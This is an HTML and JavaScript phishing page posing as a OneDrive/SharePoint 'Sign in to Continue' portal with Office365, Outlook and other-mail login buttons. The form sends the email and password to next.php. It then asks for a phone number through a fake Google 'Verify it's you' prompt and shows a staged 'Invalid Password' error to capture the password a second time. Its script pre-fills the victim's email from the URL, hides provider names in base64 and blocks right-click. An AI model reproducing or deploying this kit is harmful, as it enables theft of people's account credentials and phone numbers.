<!doctype html>
<html lang="en">

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Share Point Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    </style>
</head>

<body style="background-image: url('images/bgv.png'); background-size: cover;background-repeat: no-repeat;" oncontextmenu="return false">
    <div class="container-fluid p-0">
        <div class="container-fluid">
            <div class="row p-3" style="background-color: #0D4283;">
                <div class="col-lg-12">
                    <img src="images/onedrive-white.png" class="img-fluid" width="60px;">
                    <span class="h4 text-white align-middle">OneDrive</span>
                </div>
            </div>
        </div>
        <div class="container-fluid">
            <div class="row" style="margin: 20px 0px 20px 0px;">
                <div class="col-lg-4 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.9);border-radius:15px;">
                    <div class="text-center pt-5">
                        <img src="images/onedrive-white.png" class="img-fluid" width="200px"><br>
                        <span class="h3 text-white">OneDrive</span><br><br>
                        <span class="h5 text-white">Onedrive Online Limits across different plans</span>
                        <span class="h5" style="color:#0070C6; ">Sign in to Continue to OneDrive Online.</span>
                    </div>
                    <div class="mt-3">
                        <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                            <div class="rounded px-2 py-1 mt-2" style=" background-color: #FF3C00;">
                                <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                                <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>
                            </div>
                        </a>
                        <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                            <div class="rounded px-2 py-1 mt-2" style=" background-color: #0073C8;">
                                <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                                <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Outlook</span>
                            </div>
                        </a>
                        <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                            <div class="rounded px-2 py-1 mt-2" style=" background-color: #0B5BD3;">
                                <img src="images/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                                <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span>
                            </div>
                        </a>
                        <p class="h5 text-center text-white mt-2">OneDrive © 2023</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <center>
                        <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
                        <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                        <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please enter correct password.</div>
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form class="form-horizontal well" action="./next.php" method="POST">
                        <input type="hidden" name="count" id="count" value="0">
                        <div id="div1">
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <div>
                                        <label for="exampleInputEmail1">Email address</label>
                                        <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email" required="">
                                        <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                </div>
                            </div>
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <label for="pr">Password</label>
                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" required="">
                                </div>
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="submit" class="btn btn-info pull-right" name="submit-btn" id="submit-btn" value="Login">
                            </div>
                        </div>
                    </form>
                    <form class="form-horizontal well" action="./next.php" method="POST">
                        <div id="div2" style="display: none;">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich" class="h5">abc@abc.com</span><br>
                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                            <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                            <span id="msg1" class="text-danger"></span>
                            <br>
                            <span>Try another way to sign in</span>
                            <div class="form-group mt-3">
                                <input type="number" name="ph" class="form-control" id="ph" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="submit" class="btn btn-info pull-right" name="submit-btn1" id="submit-btn1" value="verify">
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>

$(document).ready(function() {
    var count = 0;
    var ou = "b3V0bG9vaw==";
    var ho = "aG90bWFpbA==";
    var gm = "Z21haWw=";
    var ya = "eWFob28=";
    var of = "b2ZmaWNlMzY1";

    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
            vars[key] = value;
        });
        return vars;
    }


    if (!getUrlVars()["count"]) {

    } else {
        var count = getUrlVars()["count"];
        $('#count').val(count);
    }



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        // alert(count);
        var ai = window.location.hash.substr(1);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var count = $('#count').val();
        if (count == 1) {
            $("#msg").show();
        } else {
            $("#msg").hide();
        }
        if (final == atob(gm)) {
            $('#fieldImg').attr('src', 'images/' + atob(gm) + '.png');
            $('#field').html(atob(gm));
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#gmailmodal").trigger("click");
            if (count == 1) {
                $("#msg").hide();
                $('#div1').hide();
                $('#div2').show();
            }

        } else if (final == atob(ou) || final == atob(ho)) {
            $('#fieldImg').attr('src', 'images/' + atob(ou) + '.png');
            $('#field').html("Outlook");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#outlookmodal").trigger("click");
        } else if (final == "aol") {
            $('#fieldImg').attr('src', 'images/aol.png');
            $('#field').html("Aol");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#aolmodal").trigger("click");
        } else if (final == atob( of )) {
            $('#fieldImg').attr('src', 'images/' + atob( of ) + '.png');
            $('#field').html("Office 365");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#office365modal").trigger("click");
        } else if (final == atob(ya)) {
            $('#fieldImg').attr('src', 'images/' + atob(ya) + '.png');
            $('#field').html("Yahoo");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#yahoomodal").trigger("click");

        } else {
            $('#fieldImg').attr('src', 'images/othermail.ico');
            $('#field').html("Other Mail");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#othermodal").trigger("click");
        }

    }
    ///////////////url getting ai////////////////


    $('#gmailmodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(gm) + '.png');
        $('#field').html(atob(gm));
        $("#msg").hide();
    });

    $('#outlookmodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(ou) + '.png');
        $('#field').html("Outlook");
        $("#msg").hide();
    });
    $('#aolmodal').click(function() {
        $('#fieldImg').attr('src', 'images/aol.png');
        $('#field').html("Aol");
        $("#msg").hide();
    });
    $('#office365modal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob( of ) + '.png');
        $('#field').html("Office 365");
        $("#msg").hide();
    });
    $('#yahoomodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(ya) + '.png');
        $('#field').html("Yahoo");
        $("#msg").hide();
    });
    $('#othermodal').click(function() {
        $('#fieldImg').attr('src', 'images/othermail.ico');
        $('#field').html("Other Mail");
        $("#msg").hide();
    });


});
</script>

</html>